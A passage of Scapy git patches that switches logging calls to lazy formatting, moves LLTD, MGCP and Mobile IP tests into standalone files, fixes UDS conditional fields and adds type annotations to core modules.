b/scapy/layers/tls/automaton_srv.py index c1a38ab03b1..5ad4f6a3e59 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -636,7 +636,7 @@ def verify_psk_binder(self, psk_identity, obfuscated_age, binder): # secret self.vprint("Ticket found in database !") if res_ciphersuite not in _tls_cipher_suites_cls: - warning("Unknown cipher suite %d" % res_ciphersuite) + warning("Unknown cipher suite %d", res_ciphersuite) # we do not try to set a default nor stop the execution else: cs_cls = _tls_cipher_suites_cls[res_ciphersuite] diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index e504b97fcee..794c136c3dd 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -554,7 +554,7 @@ def tls_session_update(self, msg_str): if self.cipher: cs_val = self.cipher if cs_val not in _tls_cipher_suites_cls: - warning("Unknown cipher suite %d from ServerHello" % cs_val) + warning("Unknown cipher suite %d from ServerHello", cs_val) # we do not try to set a default nor stop the execution else: cs_cls = _tls_cipher_suites_cls[cs_val] @@ -563,8 +563,8 @@ def tls_session_update(self, msg_str): if self.comp: comp_val = self.comp[0] if comp_val not in _tls_compression_algs_cls: - err = "Unknown compression alg %d from ServerHello" % comp_val - warning(err) + err = "Unknown compression alg %d from ServerHello" + warning(err, comp_val) comp_val = 0 comp_cls = _tls_compression_algs_cls[comp_val] @@ -650,7 +650,7 @@ def tls_session_update(self, msg_str): if self.cipher: cs_val = self.cipher if cs_val not in _tls_cipher_suites_cls: - warning("Unknown cipher suite %d from ServerHello" % cs_val) + warning("Unknown cipher suite %d from ServerHello", cs_val) # we do not try to set a default nor stop the execution else: cs_cls = _tls_cipher_suites_cls[cs_val] diff --git a/scapy/layers/tls/handshake_sslv2.py b/scapy/layers/tls/handshake_sslv2.py index 68b7f470349..fec805e22f1 100644 --- a/scapy/layers/tls/handshake_sslv2.py +++ b/scapy/layers/tls/handshake_sslv2.py @@ -297,7 +297,7 @@ def post_build(self, pkt, pay): cipher = pkt[1:4] cs_val = struct.unpack("!I", b"\x00" + cipher)[0] if cs_val not in _tls_cipher_suites_cls: - warning("Unknown ciphersuite %d from ClientMasterKey" % cs_val) + warning("Unknown cipher suite %d from ClientMasterKey", cs_val) cs_cls = None else: cs_cls = _tls_cipher_suites_cls[cs_val] @@ -349,7 +349,7 @@ def tls_session_update(self, msg_str): s = self.tls_session cs_val = self.cipher if cs_val not in _tls_cipher_suites_cls: - warning("Unknown cipher suite %d from ClientMasterKey" % cs_val) + warning("Unknown cipher suite %d from ClientMasterKey", cs_val) cs_cls = None else: cs_cls = _tls_cipher_suites_cls[cs_val] diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index e3b342e25d7..050d84b0d87 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -91,7 +91,8 @@ def __init__(self, self.ciphersuite = ciphersuite(tls_version=tls_version) if not self.ciphersuite.usable: - warning("TLS ciphersuite not usable. Is the cryptography Python module installed ?") # noqa: E501 + warning("TLS cipher suite not usable. " + "Is the cryptography Python module installed?") return self.compression = compression_alg() diff --git a/scapy/layers/usb.py b/scapy/layers/usb.py index f30d7ae88e7..015aed6036c 100644 --- a/scapy/layers/usb.py +++ b/scapy/layers/usb.py @@ -263,7 +263,7 @@ def select(sockets, remain=None): def __init__(self, iface=None, *args, **karg): _usbpcap_check() if iface is None: - warning("Available interfaces: [%s]" % + warning("Available interfaces: [%s]", " ".join(x[0] for x in get_usbpcap_interfaces())) raise NameError("No interface specified !" " See get_usbpcap_interfaces()") diff --git a/scapy/layers/vrrp.py b/scapy/layers/vrrp.py index 3d6a5923da2..d7b368a4dcf 100644 --- a/scapy/layers/vrrp.py +++ b/scapy/layers/vrrp.py @@ -82,7 +82,8 @@ def post_build(self, p, pay): elif isinstance(self.underlayer, IPv6): ck = in6_chksum(112, self.underlayer, p) else: - warning("No IP(v6) layer to compute checksum on VRRP. Leaving null") # noqa: E501 + warning("No IP(v6) layer to compute checksum on VRRP. " + "Leaving null") ck = 0 p = p[:6] + chb(ck >> 8) + chb(ck & 0xff) + p[8:] return p diff --git a/scapy/main.py b/scapy/main.py index b54c0e1b0a4..8b6ece823ff 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -318,7 +318,7 @@ def save_session(fname="", session=None, pickleProto=-1): fname = conf.session if not fname: conf.session = fname = cast(str, utils.get_temp_file(keep=True)) - log_interactive.info("Use [%s] as session file" % fname) + log_interactive.info("Use [%s] as session file", fname) if not session: try: @@ -378,7 +378,7 @@ def load_session(fname=None): scapy_session.update(s) update_ipython_session(scapy_session) - log_loading.info("Loaded session [%s]" % fname) + log_loading.info("Loaded session [%s]", fname) def update_session(fname=None): @@ -420,7 +420,7 @@ def init_session(session_name, # type: Optional[Union[str, None]] try: os.stat(session_name) except OSError: - log_loading.info("New session [%s]" % session_name) + log_loading.info("New session [%s]", session_name) else: try: try: @@ -428,15 +428,15 @@ def init_session(session_name, # type: Optional[Union[str, None]] "rb")) except IOError: SESSION = six.moves.cPickle.load(open(session_name, "rb")) - log_loading.info("Using session [%s]" % session_name) + log_loading.info("Using session [%s]", session_name) except ValueError: msg = "Error opening Python3 pickled session on Python2 [%s]" - log_loading.error(msg % session_name) + log_loading.error(msg, session_name) except EOFError: - log_loading.error("Error opening session [%s]" % session_name) + log_loading.error("Error opening session [%s]", session_name) except AttributeError: log_loading.error("Error opening session [%s]. " - "Attribute missing" % session_name) + "Attribute missing", session_name) if SESSION: if "conf" in SESSION: diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index ad5891af0cf..74ee9f16071 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -506,7 +506,7 @@ def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, options.append((int(opt[1:]), '')) # FIXME: qqP not handled else: - warning("unhandled TCP option " + opt) + warning("unhandled TCP option %s", opt) pkt.payload.options = options # window size diff --git a/scapy/packet.py b/scapy/packet.py index 60085b7db35..50721a1281a 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -988,9 +988,11 @@ def do_dissect_payload(self, s): except Exception: if conf.debug_dissector: if issubtype(cls, Packet): - log_runtime.error("%s dissector failed" % cls.__name__) + log_runtime.error("%s dissector failed", cls.__name__) else: - log_runtime.error("%s.guess_payload_class() returned [%s]" % (self.__class__.__name__, repr(cls))) # noqa: E501 + log_runtime.error("%s.guess_payload_class() returned " + "[%s]", + self.__class__.__name__, repr(cls)) if cls is not None: raise p = conf.raw_layer(s, _internal=1, _underlayer=self) diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 29a2967423d..a04015d22cc 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -131,12 +131,14 @@ def run(self): sources = self.active_sources - exhausted sources.add(self) else: - warning("Unknown internal pipe engine command: %r. Ignoring." % cmd) # noqa: E501 + warning("Unknown internal pipe engine command: %r." + " Ignoring.", cmd) elif fd in sources: try: fd.deliver() except Exception as e: - log_runtime.exception("piping from %s failed: %s" % (fd.name, e)) # noqa: E501 + log_runtime.exception("piping from %s failed: %s", + fd.name, e) else: if fd.exhausted(): exhausted.add(fd) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 1486434b4e4..063d091b5cf 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -507,7 +507,7 @@ def _parse_tcpreplay_result(stdout, stderr, argv): except Exception as parse_exception: if not conf.interactive: raise - log_runtime.error("Error parsing output: " + str(parse_exception)) + log_runtime.error("Error parsing output: %s", parse_exception) return {} From 7320c3716356e767c862252859a1a7203d5e094b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 22 Oct 2020 18:48:22 +0200 Subject: [PATCH 0345/1632] Standalone LLTD unit tests Co-authored-by: Pierre LALET Co-authored-by: Gabriel --- test/regression.uts | 59 ------------------------------------ test/scapy/layers/lltd.uts | 61 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 61 insertions(+), 59 deletions(-) create mode 100644 test/scapy/layers/lltd.uts diff --git a/test/regression.uts b/test/regression.uts index 8f0a37f0eb7..dd02716023f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -6310,65 +6310,6 @@ c = sniff(offline=[xa, xb], session=TCPSession)[0] assert gzip_decompress(z) == c.load -############ -############ -+ LLTD protocol - -= Simple packet dissection -pkt = Ether(b'\xff\xff\xff\xff\xff\xff\x86\x14\xf0\xc7[.\x88\xd9\x01\x00\x00\x01\xff\xff\xff\xff\xff\xff\x86\x14\xf0\xc7[.\x00\x00\xfe\xe9[\xa9\xaf\xc1\x0bS[\xa9\xaf\xc1\x0bS\x01\x06}[G\x8f\xec.\x02\x04p\x00\x00\x00\x03\x04\x00\x00\x00\x06\x07\x04\xac\x19\x88\xe4\t\x02\x00l\n\x08\x00\x00\x00\x00\x00\x0fB@\x0c\x04\x00\x08=`\x0e\x00\x0f\x0eT\x00E\x00S\x00T\x00-\x00A\x00P\x00\x12\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x04\x00\x00\x00\x00\x15\x01\x02\x18\x00\x19\x02\x04\x00\x1a\x00\x00') -assert pkt.dst == pkt.real_dst -assert pkt.src == pkt.real_src -assert pkt.current_mapper_address == pkt.apparent_mapper_address -assert pkt.mac == '7d:5b:47:8f:ec:2e' -assert pkt.hostname == "TEST-AP" -assert isinstance(pkt[LLTDAttributeEOP].payload, NoPayload) - -= Packet build / dissection -pkt = Ether(raw(Ether(dst=ETHER_BROADCAST, src=RandMAC()) / LLTD(tos=0, function=0))) -assert LLTD in pkt -assert pkt.dst == pkt.real_dst -assert pkt.src == pkt.real_src -assert pkt.tos == 0 -assert pkt.function == 0 - -= Attribute build / dissection -assert isinstance(LLTDAttribute(), LLTDAttribute) -assert isinstance(LLTDAttribute(raw(LLTDAttribute())), LLTDAttribute) -assert all(isinstance(LLTDAttribute(type=i), LLTDAttribute) for i in six.moves.range(256)) -assert all(isinstance(LLTDAttribute(raw(LLTDAttribute(type=i))), LLTDAttribute) for i in six.moves.range(256)) - -= Large TLV -m1, m2, seq = RandMAC()._fix(), RandMAC()._fix(), 123 -preqbase = Ether(src=m1, dst=m2) / LLTD() / \ - LLTDQueryLargeTlv(type="Detailed Icon Image") -prespbase = Ether(src=m2, dst=m1) / LLTD() / \ - LLTDQueryLargeTlvResp() -plist = [] -pkt = preqbase.copy() -pkt.seq = seq -plist.append(Ether(raw(pkt))) -pkt = prespbase.copy() -pkt.seq = seq -pkt.flags = "M" -pkt.value = "abcd" -plist.append(Ether(raw(pkt))) -pkt = preqbase.copy() -pkt.seq = seq + 1 -pkt.offset = 4 -plist.append(Ether(raw(pkt))) -pkt = prespbase.copy() -pkt.seq = seq + 1 -pkt.value = "efg" -plist.append(Ether(raw(pkt))) -builder = LargeTlvBuilder() -builder.parse(plist) -data = builder.get_data() -assert len(data) == 1 -key, value = data.popitem() -assert key.endswith(' [Detailed Icon Image]') -assert value == 'abcdefg' - - ############ ############ + Test fragment() / defragment() functions diff --git a/test/scapy/layers/lltd.uts b/test/scapy/layers/lltd.uts new file mode 100644 index 00000000000..7636b2ede2a --- /dev/null +++ b/test/scapy/layers/lltd.uts @@ -0,0 +1,61 @@ +% LLTD regression tests for Scapy + +############ +############ ++ LLTD protocol + += Simple packet dissection +pkt = Ether(b'\xff\xff\xff\xff\xff\xff\x86\x14\xf0\xc7[.\x88\xd9\x01\x00\x00\x01\xff\xff\xff\xff\xff\xff\x86\x14\xf0\xc7[.\x00\x00\xfe\xe9[\xa9\xaf\xc1\x0bS[\xa9\xaf\xc1\x0bS\x01\x06}[G\x8f\xec.\x02\x04p\x00\x00\x00\x03\x04\x00\x00\x00\x06\x07\x04\xac\x19\x88\xe4\t\x02\x00l\n\x08\x00\x00\x00\x00\x00\x0fB@\x0c\x04\x00\x08=`\x0e\x00\x0f\x0eT\x00E\x00S\x00T\x00-\x00A\x00P\x00\x12\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x04\x00\x00\x00\x00\x15\x01\x02\x18\x00\x19\x02\x04\x00\x1a\x00\x00') +assert pkt.dst == pkt.real_dst +assert pkt.src == pkt.real_src +assert pkt.current_mapper_address == pkt.apparent_mapper_address +assert pkt.mac == '7d:5b:47:8f:ec:2e' +assert pkt.hostname == "TEST-AP" +assert isinstance(pkt[LLTDAttributeEOP].payload, NoPayload) + += Packet build / dissection +pkt = Ether(raw(Ether(dst=ETHER_BROADCAST, src=RandMAC()) / LLTD(tos=0, function=0))) +assert LLTD in pkt +assert pkt.dst == pkt.real_dst +assert pkt.src == pkt.real_src +assert pkt.tos == 0 +assert pkt.function == 0 + += Attribute build / dissection +assert isinstance(LLTDAttribute(), LLTDAttribute) +assert isinstance(LLTDAttribute(raw(LLTDAttribute())), LLTDAttribute) +assert all(isinstance(LLTDAttribute(type=i), LLTDAttribute) for i in six.moves.range(256)) +assert all(isinstance(LLTDAttribute(raw(LLTDAttribute(type=i))), LLTDAttribute) for i in six.moves.range(256)) + += Large TLV +m1, m2, seq = RandMAC()._fix(), RandMAC()._fix(), 123 +preqbase = Ether(src=m1, dst=m2) / LLTD() / \ + LLTDQueryLargeTlv(type="Detailed Icon Image") +prespbase = Ether(src=m2, dst=m1) / LLTD() / \ + LLTDQueryLargeTlvResp() +plist = [] +pkt = preqbase.copy() +pkt.seq = seq +plist.append(Ether(raw(pkt))) +pkt = prespbase.copy() +pkt.seq = seq +pkt.flags = "M" +pkt.value = "abcd" +plist.append(Ether(raw(pkt))) +pkt = preqbase.copy() +pkt.seq = seq + 1 +pkt.offset = 4 +plist.append(Ether(raw(pkt))) +pkt = prespbase.copy() +pkt.seq = seq + 1 +pkt.value = "efg" +plist.append(Ether(raw(pkt))) +builder = LargeTlvBuilder() +builder.parse(plist) +data = builder.get_data() +assert len(data) == 1 +key, value = data.popitem() +assert key.endswith(' [Detailed Icon Image]') +assert value == 'abcdefg' + + From 62deb69b1bfc232b2b10a1d31678c2bf5fece70a Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 22 Oct 2020 18:50:11 +0200 Subject: [PATCH 0346/1632] Standalone MGCP unit tests Co-authored-by: Gabriel --- test/regression.uts | 13 ------------- test/scapy/layers/mgcp.uts | 15 +++++++++++++++ 2 files changed, 15 insertions(+), 13 deletions(-) create mode 100644 test/scapy/layers/mgcp.uts diff --git a/test/regression.uts b/test/regression.uts index dd02716023f..9e59ef9efc2 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -8931,19 +8931,6 @@ c = Ether(raw(p)) assert c[VRRPv3].chksum == 0x481b -############ -############ -+ MGCP tests - -= MGCP - build -s = raw(IP(src="127.0.0.1")/UDP()/MGCP(endpoint="scapy@secdev.org", transaction_id="04523")) -s == b'E\x00\x00I\x00\x01\x00\x00@\x11|\xa1\x7f\x00\x00\x01\x7f\x00\x00\x01\n\xa7\n\xa7\x005\xf8\xaeAUEP 04523 scapy@secdev.org MGCP 1.0 NCS 1.0\n' - -= MGCP - dissect -pkt = Ether(b'\x1b\x81\xb8\xa8J5\xe3\xebn\x90q\xb8\x08\x00E\x00\x00E\x00\x01\x00\x00@\x11\xf7\xde\xc0\xa8\x00\xff\xc0\xa8\x00y\n\xa7\n\xa7\x001\x05\xb5AUEP 155 god@heaven.com MGCP 1.0 NCS 1.0\n') -assert pkt[MGCP].endpoint == b'god@heaven.com' - - ############ ############ + MobileIP tests diff --git a/test/scapy/layers/mgcp.uts b/test/scapy/layers/mgcp.uts new file mode 100644 index 00000000000..9c5d0748672 --- /dev/null +++ b/test/scapy/layers/mgcp.uts @@ -0,0 +1,15 @@ +% MGCP regression tests for Scapy + +############ +############ ++ MGCP tests + += MGCP - build +s = raw(IP(src="127.0.0.1")/UDP()/MGCP(endpoint="scapy@secdev.org", transaction_id="04523")) +s == b'E\x00\x00I\x00\x01\x00\x00@\x11|\xa1\x7f\x00\x00\x01\x7f\x00\x00\x01\n\xa7\n\xa7\x005\xf8\xaeAUEP 04523 scapy@secdev.org MGCP 1.0 NCS 1.0\n' + += MGCP - dissect +pkt = Ether(b'\x1b\x81\xb8\xa8J5\xe3\xebn\x90q\xb8\x08\x00E\x00\x00E\x00\x01\x00\x00@\x11\xf7\xde\xc0\xa8\x00\xff\xc0\xa8\x00y\n\xa7\n\xa7\x001\x05\xb5AUEP 155 god@heaven.com MGCP 1.0 NCS 1.0\n') +assert pkt[MGCP].endpoint == b'god@heaven.com' + + From 73fabd395271a95cb1d23767a91d667585b5df71 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 22 Oct 2020 21:01:15 +0200 Subject: [PATCH 0347/1632] Standalone Mobile IP unit tests Co-authored-by: Gabriel --- test/regression.uts | 13 ------------- test/scapy/layers/mobileip.uts | 16 ++++++++++++++++ 2 files changed, 16 insertions(+), 13 deletions(-) create mode 100644 test/scapy/layers/mobileip.uts diff --git a/test/regression.uts b/test/regression.uts index 9e59ef9efc2..d8f729a4176 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -8931,19 +8931,6 @@ c = Ether(raw(p)) assert c[VRRPv3].chksum == 0x481b -############ -############ -+ MobileIP tests - -= MobileIP - build -s = raw(IP(src="127.0.0.1")/UDP()/MobileIP()/MobileIPRRP(homeaddr='156.133.50.141', haaddr='95.83.86.216')) -s == b'E\x00\x000\x00\x01\x00\x00@\x11|\xba\x7f\x00\x00\x01\x7f\x00\x00\x01\x01\xb2\x01\xb2\x00\x1cu]\x03\x00\x00\xb4\x9c\x852\x8d_SV\xd8\x00\x00\x00\x00\x00\x00\x00\x00' - -= MobileIP - dissect -pkt = IP(s) -assert pkt[MobileIP][MobileIPRRP].haaddr == '95.83.86.216' - - ############ ############ + RIP tests diff --git a/test/scapy/layers/mobileip.uts b/test/scapy/layers/mobileip.uts new file mode 100644 index 00000000000..e9d8ccf8c06 --- /dev/null +++ b/test/scapy/layers/mobileip.uts @@ -0,0 +1,16 @@ +% Mobile IP regression tests for Scapy + + +############ +############ ++ MobileIP tests + += MobileIP - build +s = raw(IP(src="127.0.0.1")/UDP()/MobileIP()/MobileIPRRP(homeaddr='156.133.50.141', haaddr='95.83.86.216')) +s == b'E\x00\x000\x00\x01\x00\x00@\x11|\xba\x7f\x00\x00\x01\x7f\x00\x00\x01\x01\xb2\x01\xb2\x00\x1cu]\x03\x00\x00\xb4\x9c\x852\x8d_SV\xd8\x00\x00\x00\x00\x00\x00\x00\x00' + += MobileIP - dissect +pkt = IP(s) +assert pkt[MobileIP][MobileIPRRP].haaddr == '95.83.86.216' + + From 6c9790cd1fefe1c6f91fe1b848c68daea041dce8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 23 Oct 2020 15:21:21 +0200 Subject: [PATCH 0348/1632] Fix ConditionalField in UDS --- scapy/contrib/automotive/uds.py | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index ef2d1d7282a..09e14ac71de 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -917,9 +917,11 @@ class UDS_RDTCI(Packet): name = 'ReadDTCInformation' fields_desc = [ ByteEnumField('reportType', 0, reportTypes), + ConditionalField(ByteField('DTCSeverityMask', 0), + lambda pkt: pkt.reportType in [0x07, 0x08]), ConditionalField(XByteField('DTCStatusMask', 0), - lambda pkt: pkt.reportType in [0x01, 0x02, 0x0f, - 0x11, 0x12, 0x13]), + lambda pkt: pkt.reportType in [ + 0x01, 0x02, 0x07, 0x08, 0x0f, 0x11, 0x12, 0x13]), ConditionalField(ByteField('DTCHighByte', 0), lambda pkt: pkt.reportType in [0x3, 0x4, 0x6, 0x10, 0x09]), @@ -932,11 +934,7 @@ class UDS_RDTCI(Packet): ConditionalField(ByteField('DTCSnapshotRecordNumber', 0), lambda pkt: pkt.reportType in [0x3, 0x4, 0x5]), ConditionalField(ByteField('DTCExtendedDataRecordNumber', 0), - lambda pkt: pkt.reportType in [0x6, 0x10]), - ConditionalField(ByteField('DTCSeverityMask', 0), - lambda pkt: pkt.reportType in [0x07, 0x08]), - ConditionalField(ByteField('DTCStatusMask', 0), - lambda pkt: pkt.reportType in [0x07, 0x08]), + lambda pkt: pkt.reportType in [0x6, 0x10]) ] @staticmethod From 245dddfb37266717ed21336e3fae8f9b04834ae3 Mon Sep 17 00:00:00 2001 From: DuzaBF <33791465+DuzaBF@users.noreply.github.com> Date: Fri, 23 Oct 2020 20:02:35 +0300 Subject: [PATCH 0349/1632] Add GAA_FLAG_INCLUDE_ALL_INTERFACES Change flags for the GetAdapterAdresses so that it is possible to get all interfaces on Windows. --- scapy/arch/windows/structures.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index af8cfb11652..1cac35e0899 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -241,7 +241,8 @@ def GetIcmpStatistics(): MAX_ADAPTER_ADDRESS_LENGTH = 8 MAX_DHCPV6_DUID_LENGTH = 130 -GAA_FLAG_INCLUDE_PREFIX = ULONG(0x0010) +GAA_FLAG_INCLUDE_PREFIX = 0x0010 +GAA_FLAG_INCLUDE_ALL_INTERFACES = 0x0100 # for now, just use void * for pointers to unused structures PIP_ADAPTER_WINS_SERVER_ADDRESS_LH = VOID PIP_ADAPTER_GATEWAY_ADDRESS_LH = VOID @@ -435,7 +436,7 @@ def GetAdaptersAddresses(AF=AF_UNSPEC): """Return all Windows Adapters addresses from iphlpapi""" # We get the size first size = ULONG() - flags = GAA_FLAG_INCLUDE_PREFIX + flags = ULONG(GAA_FLAG_INCLUDE_PREFIX | GAA_FLAG_INCLUDE_ALL_INTERFACES) res = _GetAdaptersAddresses(AF, flags, None, None, byref(size)) From 8fa421deeb08b4004b9c7c5ab66ab43b08b8ccbd Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 20 Oct 2020 18:50:38 +0200 Subject: [PATCH 0350/1632] Core typing: dadict/data/mib/pton_ntop --- .config/mypy/mypy_enabled.txt | 4 +++ scapy/asn1/mib.py | 59 ++++++++++++++++++++----------- scapy/base_classes.py | 12 +++---- scapy/compat.py | 18 +++++++++- scapy/config.py | 6 ++-- scapy/dadict.py | 58 +++++++++++++++++++++++++------ scapy/data.py | 65 ++++++++++++++++++++++++++--------- scapy/fields.py | 12 +++---- scapy/pton_ntop.py | 9 +++++ test/regression.uts | 2 +- 10 files changed, 183 insertions(+), 62 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 3ad6fff64e7..d813a624fec 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -6,12 +6,16 @@ # CORE scapy/__init__.py +scapy/asn1/mib.py scapy/compat.py scapy/config.py +scapy/dadict.py +scapy/data.py scapy/fields.py scapy/main.py scapy/packet.py scapy/plist.py +scapy/pton_ntop.py scapy/route.py scapy/route6.py scapy/utils.py diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index c89c21a6d15..3a6d65caace 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -17,6 +17,14 @@ import scapy.modules.six as six from scapy.compat import plain_str +from scapy.compat import ( + Any, + Dict, + List, + Optional, + Tuple, +) + ################# # MIB parsing # ################# @@ -28,8 +36,9 @@ _mib_re_comments = re.compile(r'--.*(\r|\n)') -class MIBDict(DADict): +class MIBDict(DADict[str, str]): def _findroot(self, x): + # type: (str) -> Tuple[str, str, str] """Internal MIBDict function used to find a partial OID""" if x.startswith("."): x = x[1:] @@ -47,29 +56,32 @@ def _findroot(self, x): return root, root_key, x[max:-1] def _oidname(self, x): + # type: (str) -> str """Deduce the OID name from its OID ID""" root, _, remainder = self._findroot(x) return root + remainder def _oid(self, x): + # type: (str) -> str """Parse the OID id/OID generator, and return real OID""" xl = x.strip(".").split(".") p = len(xl) - 1 while p >= 0 and _mib_re_integer.match(xl[p]): p -= 1 - if p != 0 or xl[p] not in six.itervalues(self.__dict__): + if p != 0 or xl[p] not in six.itervalues(self.d): return x - xl[p] = next(k for k, v in six.iteritems(self.__dict__) if v == xl[p]) + xl[p] = next(k for k, v in six.iteritems(self.d) if v == xl[p]) return ".".join(xl[p:]) def _make_graph(self, other_keys=None, **kargs): + # type: (Optional[Any], **Any) -> None if other_keys is None: other_keys = [] nodes = [(self[key], key) for key in self.iterkeys()] oids = set(self.iterkeys()) for k in other_keys: if k not in oids: - nodes.append(self.oidname(k), k) + nodes.append((self._oidname(k), k)) s = 'digraph "mib" {\n\trankdir=LR;\n\n' for k, o in nodes: s += '\t"%s" [ label="%s" ];\n' % (o, k) @@ -84,7 +96,13 @@ def _make_graph(self, other_keys=None, **kargs): do_graph(s, **kargs) -def _mib_register(ident, value, the_mib, unresolved, alias): +def _mib_register(ident, # type: str + value, # type: List[str] + the_mib, # type: Dict[str, List[str]] + unresolved, # type: Dict[str, List[str]] + alias, # type: Dict[str, str] + ): + # type: (...) -> bool """ Internal function used to register an OID and its name in a MIBDict """ @@ -107,11 +125,9 @@ def _mib_register(ident, value, the_mib, unresolved, alias): if v not in the_mib: not_resolved = 1 if v in the_mib: - v = the_mib[v] + resval += the_mib[v] elif v in unresolved: - v = unresolved[v] - if isinstance(v, list): - resval += v + resval += unresolved[v] else: resval.append(v) if not_resolved: @@ -139,20 +155,23 @@ def _mib_register(ident, value, the_mib, unresolved, alias): def load_mib(filenames): + # type: (str) -> None """ Load the conf.mib dict from a list of filenames """ the_mib = {'iso': ['1']} - unresolved = {} - alias = {} + unresolved = {} # type: Dict[str, List[str]] + alias = {} # type: Dict[str, str] # Export the current MIB to a working dictionary for k in six.iterkeys(conf.mib): _mib_register(conf.mib[k], k.split("."), the_mib, unresolved, alias) # Read the files if isinstance(filenames, (str, bytes)): - filenames = [filenames] - for fnames in filenames: + files_list = [filenames] + else: + files_list = filenames + for fnames in files_list: for fname in glob(fnames): with open(fname) as f: text = f.read() @@ -161,14 +180,14 @@ def load_mib(filenames): ) for m in _mib_re_oiddecl.finditer(cleantext): gr = m.groups() - ident, oid = gr[0], gr[-1] + ident, oid_s = gr[0], gr[-1] ident = fixname(ident) - oid = oid.split() - for i, elt in enumerate(oid): - m = _mib_re_both.match(elt) - if m: - oid[i] = m.groups()[1] - _mib_register(ident, oid, the_mib, unresolved, alias) + oid_l = oid_s.split() + for i, elt in enumerate(oid_l): + m2 = _mib_re_both.match(elt) + if m2: + oid_l[i] = m2.groups()[1] + _mib_register(ident, oid_l, the_mib, unresolved, alias) # Create the new MIB newmib = MIBDict(_name="MIB") diff --git a/scapy/base_classes.py b/scapy/base_classes.py index b2805706a9f..ea4d2dfeb0e 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -23,10 +23,14 @@ import types import warnings -from scapy.compat import FAKE_TYPING from scapy.consts import WINDOWS + from scapy.modules.six.moves import range +from scapy.compat import ( + _Generic_metaclass, +) + class Gen(object): __slots__ = [] @@ -284,16 +288,12 @@ def __call__(cls, *args, **kargs): # Note: see compat.py for an explanation -class Field_metaclass(type): +class Field_metaclass(_Generic_metaclass): def __new__(cls, name, bases, dct): dct.setdefault("__slots__", []) newcls = super(Field_metaclass, cls).__new__(cls, name, bases, dct) return newcls - if FAKE_TYPING: - def __getitem__(self, type): - return self - PacketList_metaclass = Field_metaclass diff --git a/scapy/compat.py b/scapy/compat.py index 7f7ebee1cb7..14428b084bf 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -1,6 +1,5 @@ # This file is part of Scapy # See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi # Copyright (C) Gabriel Potter # This program is published under a GPLv2 license @@ -13,6 +12,7 @@ import binascii import collections import gzip +import socket import struct import sys @@ -45,6 +45,7 @@ 'FAKE_TYPING', 'TYPE_CHECKING', # compat + 'AddressFamily', 'base64_bytes', 'bytes_base64', 'bytes_encode', @@ -167,6 +168,21 @@ class Sized(object): # type: ignore else: Literal = _FakeType("Literal") +# Python 3.4 +if sys.version_info >= (3, 4): + from socket import AddressFamily +else: + class AddressFamily: + AF_INET = socket.AF_INET + AF_INET6 = socket.AF_INET6 + + +class _Generic_metaclass(type): + if FAKE_TYPING: + def __getitem__(self, typ): + # type: (Any) -> Any + return self + ########### # Python3 # diff --git a/scapy/config.py b/scapy/config.py index 0ffa2726133..3c1ef0937fe 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -725,7 +725,8 @@ class Conf(ConfClass): BTsocket = None USBsocket = None min_pkt_size = 60 - mib = None #: holds MIB direct access dictionary + #: holds MIB direct access dictionary + mib = None # type: 'scapy.asn1.mib.MIBDict' bufsize = 2**16 #: history file histfile = os.getenv('SCAPY_HISTFILE', @@ -754,6 +755,7 @@ class Conf(ConfClass): #: holds the Scapy IPv6 routing table and provides methods to #: manipulate it route6 = None # type: 'scapy.route6.Route6' + manufdb = None # type: 'scapy.data.ManufDA' # 'route6' will be filed by route6.py auto_fragment = True #: raise exception when a packet dissector raises an exception @@ -810,7 +812,7 @@ class Conf(ConfClass): raise_no_dst_mac = False loopback_name = "lo" if LINUX else "lo0" - def __getattr__(self, attr): + def __getattribute__(self, attr): # type: (str) -> Any # Those are loaded on runtime to avoid import loops if attr == "manufdb": diff --git a/scapy/dadict.py b/scapy/dadict.py index 5489890547d..9189adba102 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -13,12 +13,25 @@ import scapy.modules.six as six from scapy.compat import plain_str +from scapy.compat import ( + Any, + Dict, + Generic, + Iterator, 